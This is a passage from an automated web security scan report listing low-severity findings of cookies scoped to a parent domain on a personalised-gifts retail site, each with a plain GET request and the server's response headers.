Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:10 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:10 GMT
Connection: close
Content-Length: 418054

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.63. http://www.personalcreations.com/personalized-communion-gifts-PCOMMUN  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-communion-gifts-PCOMMUN

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-communion-gifts-PCOMMUN HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:36 PM?0&9/3/2011 6:20:18 PM?0&9/3/2011 6:20:47 PM?0&9/3/2011 6:20:56 PM?0&9/3/2011 6:21:21 PM?0&9/3/2011 6:21:23 PM?0&9/3/2011 6:21:19 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:21:19 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:21:19 GMT
Connection: close
Content-Length: 259238

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.64. http://www.personalcreations.com/personalized-congratulations-gifts-PCONGRA  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-congratulations-gifts-PCONGRA

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-congratulations-gifts-PCONGRA HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:40 PM?0&9/3/2011 6:19:52 PM?0&9/3/2011 6:19:56 PM?0&9/3/2011 6:20:33 PM?0&9/3/2011 6:20:09 PM?0&9/3/2011 6:21:18 PM?0&9/3/2011 6:21:00 PM?0&9/3/2011 6:20:59 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:20:59 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:20:59 GMT
Connection: close
Content-Length: 404968

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.65. http://www.personalcreations.com/personalized-graduation-gifts-PGRADUA  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-graduation-gifts-PGRADUA

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-graduation-gifts-PGRADUA HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:36 PM?0&9/3/2011 6:20:18 PM?0&9/3/2011 6:20:47 PM?0&9/3/2011 6:20:56 PM?0&9/3/2011 6:21:21 PM?0&9/3/2011 6:21:23 PM?0&9/3/2011 6:21:19 PM?0&9/3/2011 6:22:03 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:22:03 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:22:05 GMT
Connection: close
Content-Length: 351790

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.66. http://www.personalcreations.com/personalized-halloween-clothes-PHALAPP  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-halloween-clothes-PHALAPP

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-halloween-clothes-PHALAPP HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:20:11 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:20:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:20:14 GMT
Connection: close
Content-Length: 333277

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.67. http://www.personalcreations.com/personalized-halloween-gifts-PHALLOW  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-halloween-gifts-PHALLOW

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-halloween-gifts-PHALLOW HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:18:53 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:18:54 GMT
Connection: close
Content-Length: 211789

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.68. http://www.personalcreations.com/personalized-halloween-treat-bags-PHALBAG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-halloween-treat-bags-PHALBAG

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-halloween-treat-bags-PHALBAG HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:35 GMT
Connection: close
Content-Length: 110641

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.69. http://www.personalcreations.com/personalized-housewarming-gifts-PHOUSEW  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-housewarming-gifts-PHOUSEW

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-housewarming-gifts-PHOUSEW HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:21:17 PM?0&9/3/2011 6:21:26 PM?0&9/3/2011 6:21:17 PM?0&9/3/2011 6:22:13 PM?0&9/3/2011 6:22:11 PM?0&9/3/2011 6:22:27 PM?0&9/3/2011 6:22:29 PM?0&9/3/2011 6:22:58 PM?0&9/3/2011 6:22:53 PM?0&9/3/2011 6:22:44 PM?0&9/3/2011 6:23:35 PM?0&9/3/2011 6:23:24 PM?0&9/3/2011 6:23:47 PM?0&9/3/2011 6:24:04 PM?0&9/3/2011 6:23:35 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:23:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:23:35 GMT
Connection: close
Content-Length: 319449

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.70. http://www.personalcreations.com/personalized-pet-gifts-PPETBSL  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-pet-gifts-PPETBSL

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-pet-gifts-PPETBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:14 PM?0&9/3/2011 6:27:54 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:10 PM?0&9/3/2011 6:29:21 PM?0&9/3/2011 6:29:12 PM?0&9/3/2011 6:29:04 PM?0&9/3/2011 6:29:29 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:29:29 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:29:30 GMT
Connection: close
Content-Length: 268297

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.71. http://www.personalcreations.com/personalized-romantic-gifts-PLARBSL  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-romantic-gifts-PLARBSL

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-romantic-gifts-PLARBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:25 PM?0&9/3/2011 6:27:59 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:46 PM?0&9/3/2011 6:28:53 PM?0&9/3/2011 6:29:27 PM?0&9/3/2011 6:29:17 PM?0&9/3/2011 6:29:16 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:29:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:29:16 GMT
Connection: close
Content-Length: 310128

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.72. http://www.wunderground.com/auto/sacbee/CA/Sacramento.html  previous  next

Summary

Severity: